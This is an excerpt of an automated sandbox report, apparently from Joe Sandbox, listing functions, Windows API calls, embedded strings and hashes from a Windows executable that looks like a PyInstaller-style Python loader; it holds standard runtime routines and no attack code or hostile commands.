Instruction Fuzzy Hash: E0E08610F1F60653FF347BB2A855138B150AF84740FC540BDDC1D822A1DE2C68858330

Function 00007FF79A32ABC8 Relevance: 2.6, APIs: 2, Instructions: 59COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(?,?,?,00007FF79A32AA45,?,?,00000000,00007FF79A32AAFA), ref: 00007FF79A32AC36
GetLastError.KERNEL32(?,?,?,00007FF79A32AA45,?,?,00000000,00007FF79A32AAFA), ref: 00007FF79A32AC40

Memory Dump Source

Source File: 00000000.00000002.1761440899.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true

Associated: 00000000.00000002.1761398941.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761486515.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761534692.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761534692.00007FF79A352000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761621851.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff79a310000_sppawx.jbxd

Similarity

API ID: CloseErrorHandleLast
String ID:
API String ID: 918212764-0
Opcode ID: 1c4273fb4a414bd16749861b25ace672462e960675883ae7dbf138385109c950
Instruction ID: 1d7509ee1532f1454ecd7224329401a4908d6d84c1a43419871d158657c5c943
Opcode Fuzzy Hash: 1c4273fb4a414bd16749861b25ace672462e960675883ae7dbf138385109c950
Instruction Fuzzy Hash: B9218411F2E64243FEB47775A554279B6829F84790FC842BDDE1E873D5CE6CE4458320

Function 00007FF79A32BF1C Relevance: 1.6, APIs: 1, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF79A32BF44

Memory Dump Source

Source File: 00000000.00000002.1761440899.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true

Associated: 00000000.00000002.1761398941.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761486515.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761534692.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761534692.00007FF79A352000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761621851.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff79a310000_sppawx.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 83fd655adac635c1bfef66338e564e5d3c087748e58eff1a34e14c1f5e77bb28
Instruction ID: ad9ec76264aea28935b10350e32ed3fb3e8805d39d2e7803bda3676b644f2c5b
Opcode Fuzzy Hash: 83fd655adac635c1bfef66338e564e5d3c087748e58eff1a34e14c1f5e77bb28
Instruction Fuzzy Hash: 9041D43291A20187FA34AF35A545279F3A0FB55B44F90417EDF8E83691CF2DE402CB61

Function 00007FF79A317F80 Relevance: 1.6, APIs: 1, Instructions: 85COMMON

Download Yara Rule

APIs

_fread_nolock.LIBCMT ref: 00007FF79A31802A

Memory Dump Source

Source File: 00000000.00000002.1761440899.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true

Associated: 00000000.00000002.1761398941.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761486515.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761534692.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761534692.00007FF79A352000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761621851.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff79a310000_sppawx.jbxd

Similarity

API ID: _fread_nolock
String ID:
API String ID: 840049012-0
Opcode ID: a04a6dff0443a84ee3e7d7b85ba5df040c793d2a730aad3af21426add8a99984
Instruction ID: 6bfb71484e6a1b8d4f838adcb1625fb6a13e43a7fa028ee07bbe339bd4c1f22f
Opcode Fuzzy Hash: a04a6dff0443a84ee3e7d7b85ba5df040c793d2a730aad3af21426add8a99984
Instruction Fuzzy Hash: 9721B121B0A65696FA20FA3265043BAF651BF46BC4FCC547CEE4D07786CE3DE0468724

Function 00007FF79A32B9AC Relevance: 1.6, APIs: 1, Instructions: 79COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF79A32BA32

Memory Dump Source

Source File: 00000000.00000002.1761440899.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true

Associated: 00000000.00000002.1761398941.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761486515.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761534692.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761534692.00007FF79A352000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761621851.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff79a310000_sppawx.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 2d5c35b5412ec9e3d722ee101ab37b91f6ea8aa9dcca92d1d4e84e7f868c2b8f
Instruction ID: 6b8bf6177bb9be6ffb9c968d0fcd6f2a0594761ba53678f265a9d87e9241a1d8
Opcode Fuzzy Hash: 2d5c35b5412ec9e3d722ee101ab37b91f6ea8aa9dcca92d1d4e84e7f868c2b8f
Instruction Fuzzy Hash: D1316E21A1A65286F7617F75884537CBA60AB80B94FD202BEEE6D033D2DF7CE4418731

Function 00007FF79A3299D1 Relevance: 1.6, APIs: 1, Instructions: 61COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 00007FF79A3299FF

Part of subcall function 00007FF79A329AF8: GetModuleHandleExW.KERNEL32 ref: 00007FF79A329B1D
Part of subcall function 00007FF79A329AF8: GetProcAddress.KERNEL32 ref: 00007FF79A329B33
Part of subcall function 00007FF79A329AF8: FreeLibrary.KERNEL32 ref: 00007FF79A329B5A

Memory Dump Source

Source File: 00000000.00000002.1761440899.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true

Associated: 00000000.00000002.1761398941.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761486515.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761534692.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761534692.00007FF79A352000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761621851.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff79a310000_sppawx.jbxd

Similarity

API ID: HandleModule$AddressFreeLibraryProc
String ID:
API String ID: 3947729631-0
Opcode ID: c67799cafce48778543f3f8f4be5d8193b6380671b5390c3378b203fc6564281
Instruction ID: 752ae3d0c7dfe6b4bea882f549b36a31d136c380c0ae97be4f7b21df04c66dc9
Opcode Fuzzy Hash: c67799cafce48778543f3f8f4be5d8193b6380671b5390c3378b203fc6564281
Instruction Fuzzy Hash: 08216932A067828AFB24AF74C4842AC73B4EB04718F94567EDA2D06AD5DF38D584CB60

Function 00007FF79A326004 Relevance: 1.6, APIs: 1, Instructions: 55COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF79A325F69

Memory Dump Source

Source File: 00000000.00000002.1761440899.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true

Associated: 00000000.00000002.1761398941.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761486515.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761534692.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761534692.00007FF79A352000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761621851.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff79a310000_sppawx.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
Instruction ID: 67f9aabfb1a49d3fd99ff180013b838c2008757056d4f7a47f9ebaafc666cf7b
Opcode Fuzzy Hash: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
Instruction Fuzzy Hash: D0115122A1E64292FA70BF61940127EF264AF85B80FC440BEEF4C57E96DF3DD6408760

Function 00007FF79A3363C4 Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF79A3363E7

Memory Dump Source

Source File: 00000000.00000002.1761440899.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true

Associated: 00000000.00000002.1761398941.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761486515.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761534692.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761534692.00007FF79A352000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761621851.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff79a310000_sppawx.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 3ea3ce3b0d542221f39e0ec21b1c29adddc4a64aa4be1ebee55588f6cedcbaa9
Instruction ID: 9271a2c0a03025514c4abb32fe168842053f75dfb0eee4508278956e07317af4
Opcode Fuzzy Hash: 3ea3ce3b0d542221f39e0ec21b1c29adddc4a64aa4be1ebee55588f6cedcbaa9
Instruction Fuzzy Hash: BF219872E1D6818AEB759F28D44137AB660EB84B54F94427CEA5D476D5DF3CD4008B10

Function 00007FF79A32042C Relevance: 1.5, APIs: 1, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF79A320480

Memory Dump Source

Source File: 00000000.00000002.1761440899.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true

Associated: 00000000.00000002.1761398941.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761486515.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761534692.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761534692.00007FF79A352000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761621851.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff79a310000_sppawx.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
Instruction ID: 6bd280a2834a2043cdb1af0ed4d72567760e637bd3f66531c0926c4d58f631f1
Opcode Fuzzy Hash: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
Instruction Fuzzy Hash: 5601A561A0974141F924EF725902169F691AF86FE0F88867DDE5C17BD6CE3CE5018710

Function 00007FF79A32EC08 Relevance: 1.3, APIs: 1, Instructions: 36memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

HeapAlloc.KERNEL32(?,?,00000000,00007FF79A32B39A,?,?,?,00007FF79A324F81,?,?,?,?,00007FF79A32A4FA), ref: 00007FF79A32EC5D

Memory Dump Source

Source File: 00000000.00000002.1761440899.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true

Associated: 00000000.00000002.1761398941.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761486515.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761534692.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761534692.00007FF79A352000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761621851.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff79a310000_sppawx.jbxd

Similarity

API ID: AllocHeap
String ID:
API String ID: 4292702814-0
Opcode ID: 359dceec71bad03d682dc04f56d48d79ef81111e86adbc932549883800f831e6
Instruction ID: 89a893273a7edb4baca4a044127127f6ccb7cfc2c244ccaf4da8dc15a3e0f0c9
Opcode Fuzzy Hash: 359dceec71bad03d682dc04f56d48d79ef81111e86adbc932549883800f831e6
Instruction Fuzzy Hash: 4EF04F50B0B61640FE747AB254922B5B6905FC4B84FDC54BCCD0E462D1DE2CA4808230

Function 00007FF79A32D66C Relevance: 1.3, APIs: 1, Instructions: 29memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

HeapAlloc.KERNEL32(?,?,?,00007FF79A320D00,?,?,?,00007FF79A32236A,?,?,?,?,?,00007FF79A323B59), ref: 00007FF79A32D6AA

Memory Dump Source

Source File: 00000000.00000002.1761440899.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true

Associated: 00000000.00000002.1761398941.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761486515.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761534692.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761534692.00007FF79A352000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761621851.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff79a310000_sppawx.jbxd

Similarity

API ID: AllocHeap
String ID:
API String ID: 4292702814-0
Opcode ID: 5ab6faa5eb5c52a79f6ef15f458d67d4847db3a002ac7bba2a3205d093894568
Instruction ID: 43981e17545ad3b6d0ad05ae6b51d6c06c424fea9fa29da47af638cf7ef42113
Opcode Fuzzy Hash: 5ab6faa5eb5c52a79f6ef15f458d67d4847db3a002ac7bba2a3205d093894568
Instruction Fuzzy Hash: 01F03410E0F20244FEB47AB259512B8B2908F94BE0FC902BCAC2E856C2DE2CA4808230

Non-executed Functions

Function 00007FF79A315820 Relevance: 229.6, APIs: 86, Strings: 45, Instructions: 400libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(?,00007FF79A3164BF,?,00007FF79A31336E), ref: 00007FF79A315830
GetLastError.KERNEL32(?,00007FF79A3164BF,?,00007FF79A31336E), ref: 00007FF79A315842
GetProcAddress.KERNEL32(?,00007FF79A3164BF,?,00007FF79A31336E), ref: 00007FF79A315879
GetLastError.KERNEL32(?,00007FF79A3164BF,?,00007FF79A31336E), ref: 00007FF79A31588B
GetProcAddress.KERNEL32(?,00007FF79A3164BF,?,00007FF79A31336E), ref: 00007FF79A3158A4
GetLastError.KERNEL32(?,00007FF79A3164BF,?,00007FF79A31336E), ref: 00007FF79A3158B6
GetProcAddress.KERNEL32(?,00007FF79A3164BF,?,00007FF79A31336E), ref: 00007FF79A3158CF
GetLastError.KERNEL32(?,00007FF79A3164BF,?,00007FF79A31336E), ref: 00007FF79A3158E1
GetProcAddress.KERNEL32(?,00007FF79A3164BF,?,00007FF79A31336E), ref: 00007FF79A3158FD
GetLastError.KERNEL32(?,00007FF79A3164BF,?,00007FF79A31336E), ref: 00007FF79A31590F
GetProcAddress.KERNEL32(?,00007FF79A3164BF,?,00007FF79A31336E), ref: 00007FF79A31592B
GetLastError.KERNEL32(?,00007FF79A3164BF,?,00007FF79A31336E), ref: 00007FF79A31593D
GetProcAddress.KERNEL32(?,00007FF79A3164BF,?,00007FF79A31336E), ref: 00007FF79A315959
GetLastError.KERNEL32(?,00007FF79A3164BF,?,00007FF79A31336E), ref: 00007FF79A31596B
GetProcAddress.KERNEL32(?,00007FF79A3164BF,?,00007FF79A31336E), ref: 00007FF79A315987
GetLastError.KERNEL32(?,00007FF79A3164BF,?,00007FF79A31336E), ref: 00007FF79A315999
GetProcAddress.KERNEL32(?,00007FF79A3164BF,?,00007FF79A31336E), ref: 00007FF79A3159B5
GetLastError.KERNEL32(?,00007FF79A3164BF,?,00007FF79A31336E), ref: 00007FF79A3159C7

Strings

PySys_SetObject, xrefs: 00007FF79A315E85, 00007FF79A315EA7
PyImport_AddModule, xrefs: 00007FF79A315BD3, 00007FF79A315BF5
Py_PreInitialize, xrefs: 00007FF79A31594F, 00007FF79A315971
PyErr_Clear, xrefs: 00007FF79A315A91, 00007FF79A315AB3
PyConfig_InitIsolatedConfig, xrefs: 00007FF79A3159AB, 00007FF79A3159CD
PyObject_CallFunction, xrefs: 00007FF79A315CE7, 00007FF79A315D09
PyUnicode_Join, xrefs: 00007FF79A315F99, 00007FF79A315FBB
PyErr_Print, xrefs: 00007FF79A315B49, 00007FF79A315B6B
PySys_GetObject, xrefs: 00007FF79A315E57, 00007FF79A315E79
PyPreConfig_InitIsolatedConfig, xrefs: 00007FF79A315DCD, 00007FF79A315DEF
PyObject_SetAttrString, xrefs: 00007FF79A315D71, 00007FF79A315D93
PyUnicode_FromFormat, xrefs: 00007FF79A315F3D, 00007FF79A315F5F
PyConfig_Read, xrefs: 00007FF79A3159D9, 00007FF79A3159FB
PyImport_ExecCodeModule, xrefs: 00007FF79A315C01, 00007FF79A315C23
GetProcAddress, xrefs: 00007FF79A315858
PyErr_Fetch, xrefs: 00007FF79A315ABF, 00007FF79A315AE1
PyObject_GetAttrString, xrefs: 00007FF79A315D43, 00007FF79A315D65
PyMarshal_ReadObjectFromString, xrefs: 00007FF79A315C5D, 00007FF79A315C7F
PyConfig_SetWideStringList, xrefs: 00007FF79A315A63, 00007FF79A315A85
PyMem_RawFree, xrefs: 00007FF79A315C8B, 00007FF79A315CAD
PyErr_Occurred, xrefs: 00007FF79A315B1B, 00007FF79A315B3D
PyErr_Restore, xrefs: 00007FF79A315B77, 00007FF79A315B99
PyImport_ImportModule, xrefs: 00007FF79A315C2F, 00007FF79A315C51
PyUnicode_FromString, xrefs: 00007FF79A315F6B, 00007FF79A315F8D
PyConfig_Clear, xrefs: 00007FF79A31597D, 00007FF79A31599F
PyErr_NormalizeException, xrefs: 00007FF79A315AED, 00007FF79A315B0F
Py_InitializeFromConfig, xrefs: 00007FF79A3158F3, 00007FF79A315915
PyObject_CallFunctionObjArgs, xrefs: 00007FF79A315D15, 00007FF79A315D37
PyUnicode_AsUTF8, xrefs: 00007FF79A315EB3, 00007FF79A315ED5
PyRun_SimpleStringFlags, xrefs: 00007FF79A315DFB, 00007FF79A315E1D
PyUnicode_Replace, xrefs: 00007FF79A315FC7, 00007FF79A315FE9
PyObject_Str, xrefs: 00007FF79A315D9F, 00007FF79A315DC1
PyUnicode_DecodeFSDefault, xrefs: 00007FF79A315F0F, 00007FF79A315F31
PyModule_GetDict, xrefs: 00007FF79A315CB9, 00007FF79A315CDB
PyUnicode_Decode, xrefs: 00007FF79A315EE1, 00007FF79A315F03
Py_IsInitialized, xrefs: 00007FF79A315921, 00007FF79A315943
PyConfig_SetString, xrefs: 00007FF79A315A35, 00007FF79A315A57
Failed to get address for %hs, xrefs: 00007FF79A315851
Py_DecodeLocale, xrefs: 00007FF79A31586F, 00007FF79A315891
Py_DecRef, xrefs: 00007FF79A315826, 00007FF79A315848
Py_Finalize, xrefs: 00007FF79A3158C5, 00007FF79A3158E7
PyConfig_SetBytesString, xrefs: 00007FF79A315A07, 00007FF79A315A29
PyEval_EvalCode, xrefs: 00007FF79A315BA5, 00007FF79A315BC7
PyStatus_Exception, xrefs: 00007FF79A315E29, 00007FF79A315E4B
Py_ExitStatusException, xrefs: 00007FF79A31589A, 00007FF79A3158BC

Memory Dump Source

Source File: 00000000.00000002.1761440899.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true

Associated: 00000000.00000002.1761398941.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761486515.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761534692.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761534692.00007FF79A352000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761621851.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff79a310000_sppawx.jbxd

Similarity

API ID: AddressErrorLastProc
String ID: Failed to get address for %hs$GetProcAddress$PyConfig_Clear$PyConfig_InitIsolatedConfig$PyConfig_Read$PyConfig_SetBytesString$PyConfig_SetString$PyConfig_SetWideStringList$PyErr_Clear$PyErr_Fetch$PyErr_NormalizeException$PyErr_Occurred$PyErr_Print$PyErr_Restore$PyEval_EvalCode$PyImport_AddModule$PyImport_ExecCodeModule$PyImport_ImportModule$PyMarshal_ReadObjectFromString$PyMem_RawFree$PyModule_GetDict$PyObject_CallFunction$PyObject_CallFunctionObjArgs$PyObject_GetAttrString$PyObject_SetAttrString$PyObject_Str$PyPreConfig_InitIsolatedConfig$PyRun_SimpleStringFlags$PyStatus_Exception$PySys_GetObject$PySys_SetObject$PyUnicode_AsUTF8$PyUnicode_Decode$PyUnicode_DecodeFSDefault$PyUnicode_FromFormat$PyUnicode_FromString$PyUnicode_Join$PyUnicode_Replace$Py_DecRef$Py_DecodeLocale$Py_ExitStatusException$Py_Finalize$Py_InitializeFromConfig$Py_IsInitialized$Py_PreInitialize
API String ID: 199729137-653951865
Opcode ID: 3ca4f2c8e8fa74ff45c561f9825c8e8d27386d4e804e1314c270c66bff6859f6
Instruction ID: 7774e550fba4a19efac0ed499f34c5a1cf86634025bda278acaaa905111b6cda
Opcode Fuzzy Hash: 3ca4f2c8e8fa74ff45c561f9825c8e8d27386d4e804e1314c270c66bff6859f6
Instruction Fuzzy Hash: FE227D24E0FB0791FA75FF75A8582B4F2A0AF04785FC591BDD82E02660EF7CA5588360

Function 00007FF79A33411C Relevance: 24.0, APIs: 9, Strings: 4, Instructions: 1226COMMON

Download Yara Rule

APIs

fegetenv.LIBCMT ref: 00007FF79A33416A
_invalid_parameter_noinfo.LIBCMT ref: 00007FF79A3347D6
_invalid_parameter_noinfo.LIBCMT ref: 00007FF79A33494C
_invalid_parameter_noinfo.LIBCMT ref: 00007FF79A334C0A
_invalid_parameter_noinfo.LIBCMT ref: 00007FF79A334E2A
_invalid_parameter_noinfo.LIBCMT ref: 00007FF79A335067
memcpy_s.LIBCPMT ref: 00007FF79A335142
memcpy_s.LIBCPMT ref: 00007FF79A3351ED
memcpy_s.LIBCPMT ref: 00007FF79A3352BC

Strings

1#QNAN, xrefs: 00007FF79A334283
1#SNAN, xrefs: 00007FF79A33427A
1#INF, xrefs: 00007FF79A334293
1#IND, xrefs: 00007FF79A334257

Memory Dump Source

Source File: 00000000.00000002.1761440899.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true

Associated: 00000000.00000002.1761398941.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761486515.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761534692.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761534692.00007FF79A352000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761621851.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff79a310000_sppawx.jbxd

Similarity

API ID: _invalid_parameter_noinfo$memcpy_s$fegetenv
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 808467561-2761157908
Opcode ID: 5eb30dd7dc62229e37aa5031b27090d50e2656cb9eae334aa241f26caa9cb01e
Instruction ID: 6fed202f26f16e7b64d93bcd576f8644637479fea680ed2187693334f9ee20b5
Opcode Fuzzy Hash: 5eb30dd7dc62229e37aa5031b27090d50e2656cb9eae334aa241f26caa9cb01e
Instruction Fuzzy Hash: 5BB2AD72E1E2828AFB749F74D5407F9B7A1FB54389FC0517DDA0A57A88DF38A9008B50

Function 00007FF79A31AD1D Relevance: 12.0, Strings: 9, Instructions: 744COMMON

Download Yara Rule

Strings

invalid literal/length code, xrefs: 00007FF79A31B452
invalid distance code, xrefs: 00007FF79A31B624
invalid literal/lengths set, xrefs: 00007FF79A31B1A3
invalid code lengths set, xrefs: 00007FF79A31AE9D
invalid code -- missing end-of-block, xrefs: 00007FF79A31B136
invalid bit length repeat, xrefs: 00007FF79A31B109
invalid distances set, xrefs: 00007FF79A31B210
invalid distance too far back, xrefs: 00007FF79A31B6E0
too many length or distance symbols, xrefs: 00007FF79A31AEB6

Memory Dump Source

Source File: 00000000.00000002.1761440899.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true

Associated: 00000000.00000002.1761398941.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761486515.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761534692.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761534692.00007FF79A352000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761621851.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff79a310000_sppawx.jbxd

Similarity

API ID:
String ID: invalid bit length repeat$invalid code -- missing end-of-block$invalid code lengths set$invalid distance code$invalid distance too far back$invalid distances set$invalid literal/length code$invalid literal/lengths set$too many length or distance symbols
API String ID: 0-2665694366
Opcode ID: 183baba8c618070380c74d0f680cff30a06716a401d1faaba0935d79222a4dc0
Instruction ID: 779b2da11932e4281ed2805a52b4313ebb0137b7219abde4b8222b5b4a8823f5
Opcode Fuzzy Hash: 183baba8c618070380c74d0f680cff30a06716a401d1faaba0935d79222a4dc0
Instruction Fuzzy Hash: 9C521572A156A68BE7A4DF24C498B7E7BE9FB44341F81813DE64A87780DB3CD844CB50

Function 00007FF79A31D19C Relevance: 10.6, APIs: 7, Instructions: 71COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 00007FF79A31D1B8
RtlCaptureContext.KERNEL32 ref: 00007FF79A31D1E5
RtlLookupFunctionEntry.KERNEL32 ref: 00007FF79A31D1FF
RtlVirtualUnwind.KERNEL32 ref: 00007FF79A31D240
IsDebuggerPresent.KERNEL32 ref: 00007FF79A31D294
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF79A31D2B1
UnhandledExceptionFilter.KERNEL32 ref: 00007FF79A31D2BC

Memory Dump Source

Source File: 00000000.00000002.1761440899.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true

Associated: 00000000.00000002.1761398941.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761486515.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761534692.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761534692.00007FF79A352000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761621851.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff79a310000_sppawx.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 3140674995-0
Opcode ID: e81d7d82d421bb6c6595da19fcb57285cd54aee8b88ef40036ddb2a35706c3b0
Instruction ID: 20b701dc6ffc5b028bacd0d82e696e89ffd76408bc77ba66904c324212a735c3
Opcode Fuzzy Hash: e81d7d82d421bb6c6595da19fcb57285cd54aee8b88ef40036ddb2a35706c3b0
Instruction Fuzzy Hash: DE311D72A0AA8186FB709F60E8443EEB364FB85744F84453EDA4E47B94EF38D548C720

Function 00007FF79A335C70 Relevance: 9.3, APIs: 6, Instructions: 334timeCOMMON

